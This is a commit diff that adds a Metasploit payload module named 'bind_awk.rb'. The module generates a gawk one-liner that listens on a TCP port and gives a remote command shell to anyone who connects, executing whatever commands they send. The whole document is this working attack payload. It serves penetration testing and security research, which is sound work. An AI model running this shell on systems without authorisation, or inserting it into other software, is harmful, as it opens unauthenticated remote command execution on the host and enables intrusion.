Land rapid7#1886, awk bind shell

Author: wvu

modules/payloads/singles/cmd/unix/bind_awk.rb

@@ -0,0 +1,56 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit4
+
+	include Msf::Payload::Single
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Unix Command Shell, Bind TCP (via AWK)',
+			'Description'   => 'Listen for a connection and spawn a command shell via AWK',
+			'Author'        =>
+				[
+					'espreto <robertoespreto[at]gmail.com>',
+					'Ulisses Castro <uss.thebug[at]gmail.com>'
+				],
+			'License'       => MSF_LICENSE,
+			'Platform'      => 'unix',
+			'Arch'          => ARCH_CMD,
+			'Handler'       => Msf::Handler::BindTcp,
+			'Session'       => Msf::Sessions::CommandShell,
+			'PayloadType'   => 'cmd',
+			'RequiredCmd'   => 'gawk',
+			'Payload'       =>
+				{
+					'Offsets' => { },
+					'Payload' => ''
+				}
+			))
+	end
+
+	#
+	# Constructs the payload
+	#
+	def generate
+		return super + command_string
+	end
+
+	#
+	# Returns the command string to use for execution
+	#
+	def command_string
+		"awk 'BEGIN{s=\"/inet/tcp/#{datastore['LPORT']}/0/0\";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'"
+	end
+
+end